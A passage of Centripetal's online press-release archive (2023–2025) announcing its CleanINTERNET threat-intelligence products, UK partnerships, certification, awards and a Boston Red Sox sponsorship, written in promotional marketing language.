available—automatically blocking threats before they ever reach the network. Powered by the world’s largest aggregation of threat intelligence, AI-accelerated processing, and expert human analysis, Centripetal stops attacks in real time, at wire speed. Trusted by enterprises, governments, educational institutions, and technology providers, Centripetal transforms how organizations defend against modern cyber threats—turning threat intelligence into threat prevention.Founded by ex-intelligence and white-hat hacker experts, Centripetal's team includes deeply specialised threat analysts, patent-holding R&D engineers, and 24/7 security operations professionals, all of whom collaborate to decode and defuse threats at scale.The firm's work on the biggest and hardest problems in cybersecurity has earned recognition and trust from the CIA, NSA, DHS, and DOD, among others. Learn more at centripetal.ai. --- ### [Partnering for Prevention: Centripetal Joins Forces with Red Helix](https://www.centripetal.ai/company/press/partnering-for-prevention-centripetal-joins-forces-with-red-helix) Published: 2025-09-09 Summary: Red Helix partners with Centripetal to deliver preventative, real-time cybersecurity for UK businesses. Together with Red Helix, a leader in cybersecurity and network performance, Centripetal is bringing the UK market a transformative approach to cyber defense — one that stops breaches before they ever reach the network.A New Era of Cybersecurity: Prevention, Not ReactionFor years, organisations have relied on reactive security models: detect, investigate, and respond. But in today’s threat landscape — where sophisticated attacks evolve by the second— reacting is no longer dynamic enough. Every delay creates opportunity for reputational damage, business disruption, and potential data loss.Centripetal changes that equation. Our unique approach operationalizes the entire global threat intelligence ecosystem in real time, proactively identifying and blocking malicious activity before it can even touch a network. This makes Centripetal’s solution the world’s only truly preventative cybersecurity platform.Red Helix has built its reputation on delivering advanced technologies and managed security services, tailored to the needs of UK businesses across industries. By integrating Centripetal’s threat intelligence gateway technology into its portfolio, Red Helix will empower its clients to stay ahead of cybercriminals, not chase after them. This partnership delivers:Real-time prevention: blocking threats before they breach the network perimeter.Comprehensive intelligence: an AI-accelerated platform that processes over 10 billion threat indicators at wire speedScalable protection: services designed for organizations of all sizes and industries.Reduced risk and complexity: removing the noise of alerts and investigations so teams can focus on what matters. "Our clients want security that doesn’t just tell them they’ve been compromised — they want assurance that attacks are being stopped before they cause harm. By partnering with Centripetal, we are delivering exactly that. This preventative approach is the missing piece in today’s cybersecurity strategies, and we’re excited to position it within our portfolio."—Rob Pocock, Technology Director, Red Helix"Centripetal was founded on the belief that prevention is the only path to resilience. Our technology doesn’t wait for breaches to unfold; it neutralises threats in real time. Partnering with Red Helix allows us to bring this vision to UK organizations, ensuring they can operate with confidence in an increasingly hostile digital environment."— Dave Silke, Managing Director, Centripetal EMEA Looking AheadThis collaboration marks a turning point for UK businesses facing relentless cyber threats. With Centripetal and Red Helix, organizations can now adopt a preventative security model that doesn’t just detect or respond, but actively stops attacks in their tracks.Together, we are setting a new standard for what cybersecurity should be: proactive, intelligent, and truly preventative.Learn more about Centripetal’s Partnerships. --- ### [Centripetal Unveils Industry-First Innovation with CleanINTERNET®6.0 Horizon](https://www.centripetal.ai/company/press/centripetal-unveils-industry-first-innovation-with-cleaninternet60-horizon) Published: 2025-06-26 Summary: Centripetal launches CleanINTERNET®️ 6.0 Horizon—the first platform to process 10+ billion threat indicators at 100+ GB/s. Redefining cyber defense with community-driven intelligence and real-time… Unlocking Unmatched Processing Power for Community-Driven Cyber DefensePORTSMOUTH, NH – June 26, 2025 – Centripetal, a leader in network security, today announced the launch of CleanINTERNET® 6.0, codenamed "Horizon"—a groundbreaking advancement in cybersecurity. Horizon can process over 10 billion units of complex threat intelligence indicators at high-performance network speeds of 100+ Gbps, transforming raw intelligence into real-time network defense at unprecedented scale.Redefining the Threat Intelligence LandscapeToday’s threat landscape is dynamic and fast-evolving, yet many organizations still rely on static policies or limited intelligence sources. This fragmented approach leaves critical blind spots and isolates defenders.“Community-based protection requires intelligence from a wide range of trusted sources,” said Jonathan Rogers, President and COO of Centripetal. “With CleanINTERNET® Horizon, we bring together the best threat intelligence minds into a unified, real-time defense system.”Revolutionary Technical AchievementThe CleanINTERNET® 6.0 Horizon release marks a complete architectural reinvention, backed by patented technologies and years of research and development:10+ Billion Indicators of Compromise (IOC) Processing – Applies the full spectrum of known global threat intelligence in microseconds at the network edge.10²¹ Decision Rate – Delivers search and compute capabilities far beyond any current network processor or hardware appliance.Packet-Level Zero Trust – Enables zero-trust enforcement at unmatched inspection depth and scale.Transformative Benefits for CustomersWith Horizon, Centripetal helps organizations move from isolated defense to community-powered protection—returning the advantage to defenders:Advantages for customers include:Prevents threats at the edge—neutralizing attacks at the point of ingress and before they reach internal systems.Shrinks the attack surface—blocking infiltration and exfiltration attempts in real-time.Optimizes SOC operations—focusing analyst attention on relevant, prioritized events.Reduces downtime—through constant, automated learning and defense adaptation without outages.Cuts costs—by reducing SIEM load and downstream tool dependency since most events are automatically resolved.CleanINTERNET® Service PortfolioCentripetal’s CleanINTERNET® platform combines real-time threat detection, blocking, and analysis, delivering industry-leading precision and speed—surpassing the processing power of any known security platform.The CleanINTERNET® solution portfolio includes:CleanINTERNET® Enterprise – Stops threats at the edge, on-prem or in the cloud.CleanINTERNET® DNS – Blocks access to malicious domains across environments.CleanINTERNET® Access – Extends DNS protection to mobile and BYOD users.CleanINTERNET® Fusion – Provides intelligent, localized defense against targeted attacks.About CentripetalCentripetal protects organizations from advanced cyber threats by harnessing the full power of global threat intelligence and delivering real-time network defense at unmatched speed and scale. --- ### [Centripetal Achieves ISO/IEC 27001:2022 Certification](https://www.centripetal.ai/company/press/centripetal-achieves-iso-iec-270012022-certification) Published: 2025-03-31 Summary: Centripetal has achieved ISO/IEC 27001:2022 certification, validating its commitment to the highest standards in information security, risk management, and global cybersecurity compliance. Galway, Ireland (April 1, 2025) - Centripetal, a global leader in intelligence powered cybersecurity solutions, is proud to announce that it has successfully achieved ISO/IEC 27001:2022 Certification, the most recognized international standard for Information Security Management Systems (ISMS).  This certification validates that Centripetal's CleanINTERNET® service and all associated professional services meet the highest standards of information security, risk management, and data protection. The achievement represents a critical milestone in Centripetal’s mission to deliver secure, trusted, and globally compliant cybersecurity solutions. “ISO 27001 is a key validation of the standards we hold ourselves to”, said Rebecca Lindley, Data and Compliance Analyst, at Centripetal. “As a cybersecurity company providing advanced defenses powered by threat intelligence, it’s important that we set an example and demonstrate the same standards we help others achieve,” said Dave Silke, MD of Europe, at Centripetal. ISO/IEC 27001:2022 sets the benchmark for how organizations manage and protect sensitive information. It encompasses a systematic, risk-based approach involving people, processes, and technology to prevent unauthorized access, use, disclosure, or destruction of data.  The latest 2022 version of the standard introduces more rigorous and modernized requirements that reflect the evolving cybersecurity landscape - including considerations for data privacy, software development, cloud computing, distributed teams, and regulatory mandates such as GDPR. By achieving this certification, Centripetal enhances its ability to: Reduce the risk of security incidents and breaches   Improve resiliency and threat readiness Build greater trust with clients, partners, and regulated industries Operate seamlessly in global markets with heightened assurance.  “This accreditation means that we now carry a higher trust rating with regard to our business operations and can more easily engage with highly regulated sectors across the globe”, said Jonathan Rogers, COO, at Centripetal. “It reflects a strong commitment to reducing security incidents proactively and managing any information security threats effectively - minimizing potential reputational or operational impacts”. About Centripetal Centripetal, headquartered in Reston, VA, with offices in Portsmouth, NH and Galway, Ireland, is an innovative provider of CleanINTERNET®. This fully managed service delivers intelligence-led cybersecurity, protecting customers and organizations from all known cyber threats and zero-day attacks. CleanINTERNET® operationalizes all actionable threat intelligence from our global partners and data sources, using innovative patented technologies. This provides the only proactive approach to intelligence-powered cybersecurity, leveraging the latest computing technology and skilled operations intelligence analysts at a dramatically lower cost. Our team of experts in threat intelligence includes cryptologists and security analysts from the U.S. Intelligence and Defense community, with experience protecting the world's most sensitive assets. --- ### [Centripetal Expands UK Partner Programme](https://www.centripetal.ai/company/press/centripetal-expands-uk-partner-programme) Published: 2024-11-19 Summary: Centripetal, the global leader in intelligence poweredcybersecurity, has announced the launch of its UK Partner Programme. Provides Fully Managed Cybersecurity Service by operationalising the world’s cyber threat intelligenceManchester, UK (November 19, 2024) – Centripetal, the global leader in intelligence powered cybersecurity, has announced the launch of its UK Partner Programme, a strategic move designed to enable IT Service Providers to offer a fully managed cyber security solution to the UK market. At a time where many companies are struggling to hire cybersecurity professionals, Centripetal provides a cybersecurity solution that proactively shields threats from entering an Enterprise network by operationalising global threat intelligence. This fully managed service, incorporating human and AI analysts, allows MSPs, ISP (Internet Service Providers) and MSSP’s (Managed Security Service Providers) to increase an Enterprise’s IT and security team and provide automated proactive cybersecurity protection from malicious activity. Centripetal’s CleanINTERNET® technology is already trusted by service providers, resellers, and technology partners across North America, EMEA, and Asia-Pacific. With the Centripetal UK Partner Programme, British organisations can now access advanced threat intelligence solutions that transform cybersecurity from a reactive process into a proactive, preemptive defence for small, medium and large organisations for on-premise, cloud and Data Centre environments. In the UK’s rapidly evolving digital landscape, Centripetal’s Partner Programme gives MSPs and MSSPs a differentiated approach to cyber defence. The programme offers: Unmatched Intelligence: Centripetal’s solutions harness the world’s largest collection of threat intelligence to deliver proactive network protection, strengthening the overall cybersecurity posture of British businesses.Intelligence Analysts: Partners benefit from Centripetal’s elite team of intelligence operations analysts, who provide hands-on monitoring, tuning, and protection, effectively acting as an extension of each partner’s internal cybersecurity team.Growth Opportunities: By joining the Centripetal UK Partner Programme, MSPs and MSSPs unlock new revenue streams through resale and value-added services, helping to future-proof their businesses while delivering substantial security benefits to their clients. “UK-based MSPs and MSSPs are crucial players in the fight against cybercrime. Centripetal’s Partner Programme is tailored to enable them to proactively defend British businesses,” said Dave Silke, MD Centripetal, Europe. “Together, with our partners, we are building a safer digital environment across the UK, one that stays a step ahead of cyber threats.” For UK managed service providers interested in becoming part of the Centripetal Partner Programme, visit centripetalstg.wpenginepowered.com/partners. Contacts: David Silke, dsilke@centripetal.ai, +353-86-8728523 --- ### [Centripetal Expands Portfolio with CleanINTERNET® DNS, Powered by The Most Extensive Collection of Threat Intelligence in the Industry](https://www.centripetal.ai/company/press/cleaninternet-dns-powered-by-intelligence) Published: 2024-05-30 Summary: CleanINTERNET® DNS is the first-ever solution to leverage advanced threat intelligence from multiple providers to proactively prevent users from accessing malicious websites and harmful content.  RESTON, VA (May 30, 2024) – Centripetal, the global leader in intelligence powered cybersecurity, today announced that it is expanding its offering to include CleanINTERNET® DNS to preemptively safeguard businesses against web-based cyber threats. Unlike other DNS filtering products that rely solely on blocklists, CleanINTERNET® DNS is the first-ever solution to leverage advanced threat intelligence from multiple providers to proactively prevent users from accessing malicious websites and harmful content.  DNS, the internet's directory service, plays a crucial role in online communication by translating domain names into IP addresses. Despite its immense value, DNS remains largely invisible to most users. However, the internet is plagued by malicious activity, and DNS can unwittingly aid hackers in redirecting and defrauding unsuspecting users. Even with ongoing efforts to educate employees about cybersecurity best practices, over 80% of breaches stem from human error, with more than half of employees falling victim to phishing emails that lead them to known malicious websites.  “The proactive use of intelligence is the only viable solution to help organizations navigate the ever-evolving threat landscape. DNS, often overlooked as a mere utility service, wields immense power in safeguarding sensitive data,” said Jonathan Rogers, COO of Centripetal. “The launch of our DNS solution will set the new standard for the application of the majority of the globe’s threat intelligence into an enterprise’s DNS solution. A single attack can cripple an entire network within minutes, making DNS protection a critical linchpin in our defense against cyber adversaries.” CleanINTERNET® DNS is a cost-effective solution for enterprises. It provides an industry-first capability by incorporating the world’s largest threat intelligence collection, safeguarding remote users by preventing access to malicious sources and protecting network and data integrity from remote assets. Key benefits include:Total DNS Protection: Mitigating the risk of malware and phishing attacks on valuable business assets while also shielding users from accessing malicious sites.Comprehensive DNS Request Oversight:  Interrogating both outbound DNS requests and inbound DNS responses for any malicious websites or IP addresses.Robust Cybersecurity Posture: Improving security awareness among users in an effort to help businesses further protect their valuable assets.Unparalleled Reporting: Centripetal’s team of Intelligence Operations Analysts provide reports on DNS activity to help identify questionable behavior and unusual traffic while also allowing companies to gain visibility into user interaction through DNS filter logs.Rapid Deployment: Implementation happens in just minutes by easily routing requests to Centripetal’s CleanINTERNET® DNS service.ABOUT CENTRIPETAL Centripetal is The Official Cyber Network Security Partner of The Boston Red Sox and Fenway Park along with hundreds of other critical organizations around the world. Centripetal is the global leader in intelligence powered cybersecurity and is operationalizing the world’s largest collection of threat intelligence, in real-time, to protect organizations from every known cyberthreat through its innovative patented technologies. Through its CleanINTERNET® service, Centripetal delivers a highly effective solution leveraging the latest computing technology and skilled intelligence operators at a significantly lower cost. We are experts in intelligence, with a team comprised of cryptologists, and  security operators from the U.S. Intelligence & Defense community who have protected the most sensitive assets in the world. Centripetal is based in Reston, VA with offices in Portsmouth, NH and Galway, Ireland.  --- ### [Centripetal’s Jess Parnell Named Chief Information Security Officer of The Year](https://www.centripetal.ai/company/press/centripetal-wins-three-2024-cybersecurity-excellence-awards) Published: 2024-05-21 Summary: Centripetal wins three 2024 Cybersecurity Excellence Awards, recognized for its ongoing commitment to changing the security paradigm. RESTON, VA (MAY 21, 2024) -  Centripetal, the global leader in intelligence powered cybersecurity, has won three 2024 Cybersecurity Excellence Awards, which include Jess Parnell as CISO of the Year, Most Innovative Cybersecurity Company,  and the winner of Intelligence Powered Cybersecurity. This recognition underscores Jess's dedication to advancing the field of intelligence powered cybersecurity, as well as the company's commitment to innovation and excellence in cybersecurity. Jess Parnell, a staunch advocate for security, has played a pivotal role in advancing Centripetal's mission to make intelligence powered cybersecurity the strongest defense against cybercrime. With a rich and varied career spanning multiple industries and roles, Jess brings a wealth of experience to his role at Centripetal. Previously, Jess served as the Security Operations Center Manager for the Department of Health and Human Services. During his tenure he created the Incident Analysis Investigative Team, which was recognized for its exceptional detection and mitigation efforts in high-profile incidents, and successfully protected the initial rollout of Healthcare.gov from cyber attacks. Joining Centripetal in 2015 as the Director of Security Operations, Jess's commitment and expertise led to his promotion to CISO in 2023, where he continues to drive innovation and excellence in cybersecurity. “I am deeply honored and humbled to be named CISO of the year from the Cybersecurity Excellence Awards, and truly impressed that Centripetal continues to be recognized as an innovative winner for being a leader in intelligence powered cybersecurity,” said Jess Parnell, CISO at Centripetal. “This recognition is a testament to the hard work and dedication of the entire Centripetal team. I am incredibly proud of what we have achieved together, and I look forward to continuing to drive innovation and excellence in cybersecurity to protect our clients from evolving threats.”  There is a clear paradigm shift emerging in the way enterprises are approaching cybersecurity. The Boston Red Sox, one of the most iconic sports organizations in the world, recently chose Centripetal to protect their network and Fenway Park. Their strong belief that the use of intelligence to proactively defend against cyber threats is a clear example of the massive change that is taking place. The 2024 Cybersecurity Excellence Awards recognize and celebrate companies, products and professionals that demonstrate excellence, innovation and leadership in information security. The award recipients have been selected based on the strength of their nomination as well as the popular vote by members of the Information Security Community. For more information about Centripetal visit centripetalstg.wpenginepowered.com.  ABOUT CENTRIPETAL Centripetal, a global leader in intelligence powered cybersecurity, is operationalizing the world’s largest collection of threat intelligence, in real-time, to protect organizations from cyberthreat through its innovative patented technologies. With CleanINTERNET®, Centripetal delivers a highly effective solution leveraging a revolution in computing technology and skilled intelligence operators to lower the cost of cyber defense. We are experts in intelligence, with a team comprised of cryptologists, and  security operators from the U.S. Intelligence & Defense community who have protected the most sensitive assets in the world. Centripetal is based in Reston, VA with offices in Portsmouth, NH and Galway, Ireland.  --- ### [Centripetal Named Winner of the Coveted Global InfoSec Awards during RSA Conference 2024](https://www.centripetal.ai/company/press/centripetal-named-winner-of-global-infosec-award-2024) Published: 2024-05-06 Summary: Centripetal has won the Next Gen Intelligence Powered Security award from Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine. RSA CONFERENCE, SAN FRANCISCO (MAY 6, 2024) -  Centripetal, the global leader in intelligence powered cybersecurity, is proud to announce that it has won the Next Gen Intelligence Powered Security award from Cyber Defense Magazine (CDM), the industry’s leading electronic information security magazine. The traditional approach to network security has failed and zone based defenses are not enough. Cumulative breach research has shown that the intelligence community has the answer when it counts. Centripetal’s intelligence powered defense is a technology breakthrough making it possible to harness all of this global knowledge. Intelligence powered security requires continuous monitoring and analysis of all threat intelligence before a threat arrives. Reacting after the fact isn’t viable any longer.  “We’re thrilled to win the Next Gen Intelligence Powered Security award from Cyber Defense Magazine,” said Jonathan Rogers, Chief Operating Officer of Centripetal. “We’re now in a new security era. The community has shifted to require action instead of reaction. This marks a major shift in cyber defense that is now possible with the convergence of AI, immense processing power, and the global intel community. We bring these three together.” Centripetal has invested over 14 years in developing ground breaking technologies, based on more than 100 patents all at the heart of a new intelligence powered cybersecurity strategy. With its CleanINTERNET® service, the company leverages the world’s largest collection of intelligence to preemptively protect organizations from emerging threats in real-time. This approach results in a secure network at massively reduced cost. “Centripetal embodies three major features we judges look for to become winners: understanding tomorrow’s threats, today, providing a cost-effective solution and innovating in unexpected ways that can help mitigate cyber risk and get one step ahead of the next breach,” said Gary S. Miliefsky, Publisher of Cyber Defense Magazine. ABOUT CENTRIPETAL Centripetal, a global leader in intelligence powered cybersecurity, is operationalizing the world’s largest collection of threat intelligence, in real-time, to protect organizations from cyberthreat through its innovative patented technologies. With CleanINTERNET®, Centripetal delivers a highly effective solution leveraging a revolution in computing technology and skilled intelligence operators to lower the cost of cyber defense. We are experts in intelligence, with a team comprised of cryptologists, and  security operators from the U.S. Intelligence & Defense community who have protected the most sensitive assets in the world. Centripetal is based in Reston, VA with offices in Portsmouth, NH and Galway, Ireland. About Cyber Defense Magazine Cyber Defense Magazine is the premier source of cyber security news and information for InfoSec professionals in business and government. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products, and services in the information technology industry.  We deliver electronic magazines every month online for free, and special editions exclusively for the RSA Conferences. CDM is a proud member of the Cyber Defense Media Group. Learn more about us at https://www.cyberdefensemagazine.com and visit https://www.cyberdefensetv.com and https://www.cyberdefenseradio.com to see and hear some of the most informative interviews of many of these winning company executives.  Join a webinar at https://www.cyberdefensewebinars.com and realize that infosec knowledge is power.  --- ### [Boston Red Sox Choose Centripetal as Cyber Network Security Partner](https://www.centripetal.ai/company/press/boston-red-sox-choose-centripetal-as-cyber-network-security-partner) Published: 2024-03-05 Summary: Centripetal, the global leader in intelligence powered cybersecurity, today announced that it has been selected as the Official Cyber Network Security Partner for the Boston Red Sox and Fenway Park. Reston, VA – March 5, 2024 -- Centripetal, the global leader in intelligence powered cybersecurity, today announced that it has been selected as the Official Cyber Network Security Partner for the Boston Red Sox and Fenway Park. Under the multi-year partnership, Centripetal will protect the Boston Red Sox by deploying its CleanINTERNET® solution at Fenway Park and their training facilities. Bad actors are increasingly looking to the sports industry in their quest for new targets. National sports teams, major and minor leagues, global sporting associations, and entertainment venues all possess valuable personal and business data. A recent study conducted by the National Cyber Security Centre found that 70% of sports organizations experience at least one cyberattack each year. Centripetal is the only cybersecurity company to successfully operationalize global threat intelligence and provide a completely proactive cybersecurity solution. Recognizing the unique needs of the Boston Red Sox, Centripetal is customizing its CleanINTERNET solution to address vulnerabilities unique to the sporting and entertainment industry. This customization ensures a holistic and adaptive approach to cybersecurity that ensures the integrity of the Boston Red Sox’s sensitive data and information, and maintains the trust of fans, sponsors and the broader community. According to Jonathan Rogers, Chief Operating Officer at Centripetal, “Centripetal is honored to provide intelligence-powered cybersecurity protection for such an iconic legacy team and  brand. Cyber attacks are today’s most disruptive business risk, causing an average of more than 16 days of downtime. Centripetal is honored to work closely with the Boston Red Sox to proactively mitigate cyber risk with our patented CleanINTERNET solution, so that they can focus on providing the best experience possible for their fans.”   According to Brian Shield, Senior Vice President, Chief Technology Officer/Information Technology for the Boston Red Sox, “We understand the malicious nature of today’s cyber attackers, and we wanted to defend our network and data as proactively as possible. This collaboration with Centripetal ensures uninterrupted operations. By mitigating cyber risks effectively, the Boston Red Sox and Fenway Park can focus on delivering exceptional sporting and entertainment experiences, events and fan engagement without the disruption caused by cyber incidents. That’s the Centripetal difference.” \CleanINTERNET® is an intelligence-powered security solution using high-performance computing technology, patented software algorithms and uniquely skilled security analysts to deliver a robust alternative protection strategy at a significantly lower cost. CleanINTERNET® presents an alternative approach to cybersecurity, putting threat intelligence at the forefront, moving from reactive to proactive defense, and helping security teams be more efficient and effective.  ABOUT CENTRIPETAL Centripetal, a global leader in intelligence powered cybersecurity, is operationalizing the world’s largest collection of threat intelligence, in real-time, to protect organizations from every known cyberthreat through its innovative patented technologies. Through its CleanINTERNET® solution, Centripetal delivers a highly effective solution leveraging the latest computing technology and skilled intelligence operators at a significantly lower cost. We are experts in intelligence, with a team comprised of cryptologists, and security operators from the U.S. Intelligence & Defense community who have protected the most sensitive assets in the world. Centripetal is based in Reston, VA with offices in Portsmouth, NH and Galway, Ireland.  --- ### [Centripetal Partners With Tiger to Provide Cutting-Edge Cybersecurity Innovation to the UK Market for the First Time](https://www.centripetal.ai/company/press/centripetal-partners-with-tiger) Published: 2023-12-05 Summary: Centripetal partners with Tiger to provide intelligence powered cybersecurity to the UK market for the first time. London, England (December 5, 2023) - Centripetal, the global leader in intelligence powered cybersecurity, today announced that its award winning, patented cybersecurity threat solution is available for the first time ever across the UK as a result of its strategic partnership with Tiger. Centripetal’s innovative technology is currently deployed by over 100 customers in the U.S., where the company is headquartered. With this partnership, Tiger and its customers will have a stronger approach to cybersecurity, putting operationalised threat intelligence at the forefront, moving from a reactive to proactive defence, and helping security teams be more efficient and effective.  The Tiger team initiated a Proof of Concept with Centripetal's CleanINTERNET® in the spring, recognizing their ultimate responsibility as a SaaS provider to safeguard both their data and their customers'. Upon deployment, the Tiger IT team quickly embraced CleanINTERNET®'s distinctive capabilities. In just 5 weeks, Tiger progressed from a 0% to an impressive 98% shielding posture. This implies that out of all captured traffic matching threat intelligence, 98% was effectively shielded, while the remaining 2% underwent monitoring without being deemed necessary for action. CleanINTERNET® proved particularly effective in countering the top three threat categories affecting Tiger: Reconnaissance, Malware, and Spam.  “Working with Centripetal has been a revelation,” said Ben Nicklen, CEO at Tiger. “From the moment we deployed the product we were impressed by its capabilities, and have already found that via CleanINTERNET® we have discovered areas of vulnerability that we were not previously aware of, and could have led to major security incidents if not detected. We’re delighted to be in a position where we can now recommend CleanINTERNET® to our customers, with Centripetal as our strategic partner.”  As a small but ambitious team, Tiger was eager to find a robust cybersecurity solution that would protect organisations from every known cyber threat. Once deployed, CleanINTERNET® saved the Tiger IT team 85 hours, not only providing them with peace of mind that their system is protected, but also time back to focus on other meaningful tasks. “For the first time, UK Enterprise’s will have access to Centripetal’s cybersecurity solution, which operationalises threat intelligence from across the globe to provide a proactive cybersecurity protection for our customers. We are delighted to have Tiger on board as both a customer and a strong partner,” said Dave Silke, European MD at Centripetal. “It’s not a matter of if, it’s a matter of when organisations will be targeted in a cyber attack. To conquer the battle, we need partners who are able to help us spread the message about our proactive and intelligence-powered approach to cybersecurity. Tiger now being on board to help us on this mission is a fantastic step in the right direction.”  Founded in 1979, Tiger provides SaaS analytics and data solutions in the unified communications and collaboration market to UK customers. Picking up data points from Zoom, Microsoft Teams and Cisco Webex, Tiger’s customers use it for myriad purposes ranging from regulatory and compliance to business and people performance. Tiger’s software can scale from small SMBs to large enterprises across industries encompassing the financial, public, healthcare and education sectors.  This news comes on the heels of Centripetal’s Global Partner Program and European Cyber Intelligence Centre of Excellence to address cybersecurity opportunities in the UK, Ireland and across Europe.  ABOUT CENTRIPETAL Centripetal, a global leader in intelligence powered cybersecurity, is operationalizing the world’s largest collection of threat intelligence, in real-time, to protect organisations from every known cyberthreat through its innovative patented technologies. Through its CleanINTERNET® service, Centripetal delivers a highly effective solution leveraging the latest computing technology and skilled intelligence operators at a significantly lower cost. We are experts in intelligence, with a team comprised of cryptologists, and  security operators from the U.S. Intelligence & Defense community who have protected the most sensitive assets in the world. Centripetal is based in Reston, VA with offices in Portsmouth, NH and Galway, Ireland. --- ### [CleanINTERNET® is now available in the UK](https://www.centripetal.ai/company/press/cleaninternet-now-available-in-the-uk) Published: 2023-12-05 Summary: After deploying Centripetal's CleanINTERNET® in the UK, Tiger saw over 130k malicious events blocked from 132 countries across the globe. You might recall hearing that we officially launched our Global Partner Program. It was important for us to ensure that our CleanINTERNET® solution was available immediately in the UK, and thanks to our latest partnership with Tiger this is now possible. Our innovative technology is currently deployed by over 100 customers in the U.S. With this partnership, Tiger and its customers will have a stronger approach to cybersecurity, putting operationalized threat intelligence at the forefront, moving from a reactive to proactive defense, and helping security teams be more efficient and effective. Talk about a win, win! When we started this journey with Tiger we immediately recognized that their ultimate goal as a SaaS provider was to safeguard not only their assets and data but also their customers. Once we deployed CleanINTERNET®, the Tiger team immediately saw the benefits. Tiger progressed from a 0% to an impressive 98% shielding posture. This means that out of all captured traffic matching threat intelligence, 98% was effectively shielded, while the remaining 2% underwent monitoring without being deemed necessary for action. CleanINTERNET® proved particularly effective in countering the top three threat categories affecting Tiger: reconnaissance, malware, and spam. CleanINTERNET® not only proved successful, but it helped eliminate some of the burden on the Tiger IT team. The small, but mighty Tiger IT team was ready to find a cybersecurity solution that would protect against every known cyber threat. With CleanINTERNET® up and running, they estimate that our patented solution saved them roughly 85 hours. This provides Tiger peace of mind knowing that they are protected along with their customers’, but also gives the IT team time back to focus on other meaningful tasks to help move the company forward.  Ben Nicklen, Tiger’s CEO, said that working with us has been a revelation. “From the moment we deployed the product we were impressed by its capabilities, and have already found that via CleanINTERNET® we have discovered areas of vulnerability that we were not previously aware of, and could have led to major security incidents if not detected. We’re delighted to be in a position where we can now recommend CleanINTERNET® to our customers, with Centripetal as our strategic partner.”  Being proactive and deploying intelligence powered cybersecurity is critical as the bad guys are getting more and more sophisticated by the day. To conquer this we need partners around the world who can help spread the message, but most importantly take the steps to protect their networks. Learn more about our Global Partner Program, here. We would love to hear from you, so don’t hesitate to reach out to have a chat. --- ### [Centripetal Launches Global Partner Program, Empowering Partners to Proactively Leverage Threat Intelligence for Unparalleled Protection](https://www.centripetal.ai/company/press/centripetal-launches-global-partner-program) Published: 2023-11-14 Reston, VA (November 14, 2023) - Centripetal, the global leader in intelligence powered cybersecurity, today launched its partner program to protect organizations around the world by operationalizing threat intelligence to safeguard them from every known cyberthreat.  Centripetal’s innovative technology is currently deployed by MSP’s, resellers and technology partners across America, EMEA and Asia-PAC. With the Centripetal Global Partner Program, organizations will have a stronger approach to cybersecurity, putting operationalized threat intelligence at the forefront, moving from a reactive to proactive defense, and helping security teams be more efficient and effective. Critical results and findings can be identified by Centripetal’s CleanINTERNET® solution within minutes after install is complete.  “We remain consistently amazed by Centripetal's CleanINTERNET® solution and its ability to safeguard internet traffic from well-known threat actors” stated Chuck Veth, CEO at CVM. “Unlike traditional firewalls that assess traffic validity, this technology focuses solely on public endpoints, cross-referencing them with extensive threat intelligence feeds containing countless identifiers. It's truly impressive to witness their increased dedication and investment in their partner program. CleanINTERNET's® distinctive patented technologies leverage global threat intelligence and technical innovation, establishing it as both the initial and ultimate line of defense.” “In an era where the digital landscape increasingly fraught with cyber threats, Centripetal is a vital asset for Irish organizations seeking comprehensive protection,” said Michael Conway, Director at Renaissance. “Centripetal's Global Partner Program extends the scope of their cutting-edge cybersecurity solutions, offering organizations a real-time view of threat analysis and access to actionable global threat intelligence, enabling them to proactively address emerging security threats.” The Centripetal Global Partner Program provides channel partners with Centripetal’s innovative and patented solution, which includes: Intelligence– Leveraging the world’s largest collection of global threat intelligence, experience firsthand cutting-edge intelligence-powered solutions that proactively protect networks and elevate the capabilities of existing security suites.Expertise - Centripetal’s elite team of highly trained intelligence operations analysts will help every partner monitor, tune and shield their customers networks from malicious traffic, acting as an extension of an internal cybersecurity team.Exponential Growth - Centripetal’s innovative approach to cyber defense helps significantly diminish customers' risk exposure. Partnering with Centripetal opens doors to revenue enhancement opportunities through both resale and value-added services.“Our global partners are pivotal in driving the proactive adoption of CleanINTERNET® within the enterprise landscape,” added Dave Silke, CMO at Centripetal. “Together, we fortify organizations with the knowledge and tools needed to stay ahead of emerging threats, securing a safer digital future for all.” ABOUT CENTRIPETAL Centripetal, a global leader in intelligence powered cybersecurity, is operationalizing the world’s largest collection of threat intelligence, in real-time, to protect organizations from every known cyberthreat through its innovative patented technologies. Through its CleanINTERNET® service, Centripetal delivers a highly effective solution leveraging the latest computing technology and skilled intelligence operators at a significantly lower cost. We are experts in intelligence, with a team comprised of cryptologists, and  security operators from the U.S. Intelligence & Defense community who have protected the most sensitive assets in the world. Centripetal is based in Reston, VA with offices in Portsmouth, NH and Galway, Ireland.  --- ### [Centripetal Expands Innovative CleanINTERNET® Technology to the Cloud](https://www.centripetal.ai/company/press/centripetal-expands-to-cleaninternet-cloud) Published: 2023-05-30 Summary: The launch of CleanINTERNET® CLOUD extends intelligence powered protection to enterprise assets anywhere - whether on premises, remote or in the cloud. RESTON, VA (May 30, 2023) – Centripetal, the global leader in intelligence powered cybersecurity, today announced the launch of CleanINTERNET® CLOUD extending protection to enterprise assets anywhere - whether on premises, remote or in the cloud. CleanINTERNET® is a revolutionary approach to defending organizations from cyber threats. By leveraging dynamic threat intelligence from more than 250 threat intelligence providers in real-time, CleanINTERNET® proactively shields networks from 99% of known threats. This technology provides customers with unparalleled protection, removing the need for more costly cybersecurity infrastructure. Businesses are seeing significant value from the transition of key resources into the cloud.  Public cloud infrastructure allows for tremendous flexibility of deployment and the ability to scale applications rapidly. But as more and more infrastructure migrates into the cloud, enterprises need to be fully aware of increased security risks resulting from a larger attack surface. Any server deployed in the cloud is a potential target for hackers. A recent study found that 81% of organizations have experienced a cloud-related security incident in 2022, and the average cost of a data breach has reached a record high of $4.35 million in the United States. Therefore cybersecurity concerns need to be top of mind for all cloud based initiatives.  “Today's global cyberthreat landscape is constantly evolving and becoming more sophisticated, requiring a more proactive and adaptable approach to cybersecurity. Collectively, we have the power and the responsibility to build a secure digital world, and it begins with neutralizing the ever-present and constantly evolving cyberthreats,” said Jonathan Rogers, Chief Operating Officer at Centripetal. “The team at Centripetal is laser focused on staying one step ahead of the adversaries who seek to exploit our digital vulnerabilities. This is why we are opening our European Cyber Intelligence Centre of Excellence in Galway and deploying our CleanINTERNET® offering to the cloud. It’s crucial for our worldwide customers to be protected in any environment to safeguard their valuable data and assets.” Today, Centripetal is the largest commercial consumer of cyber 